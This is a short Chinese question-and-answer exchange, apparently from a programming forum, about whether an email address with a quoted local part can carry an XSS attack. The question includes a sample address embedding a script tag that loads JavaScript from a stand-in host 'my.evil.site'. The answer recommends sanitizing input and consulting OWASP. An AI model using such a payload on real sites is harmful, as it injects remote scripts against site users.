我想知道电子邮件地址是否可以用于XSS攻击。
假设有一个网站可以注册并提供他的电子邮件地址。如果一个人想攻击给定的网站,他或她可能会创建一个电子邮件地址,比如这个:
"<script src=//my.evil.site/is/attacking/u.js></script>"@stmpname.com
然后使用此电子邮件地址攻击网站。
电子邮件地址中是否允许使用引号或脚本标记?
示例中的电子邮件地址似乎有效。唯一不寻常的字符是引号"
——其他字符都有效。
维基百科提示您指定的电子邮件地址是有效的。
您需要确保在呈现任意用户输入之前对其进行净化。
首先,您可能需要参考OWASP中提供的有关XSS和预防的信息。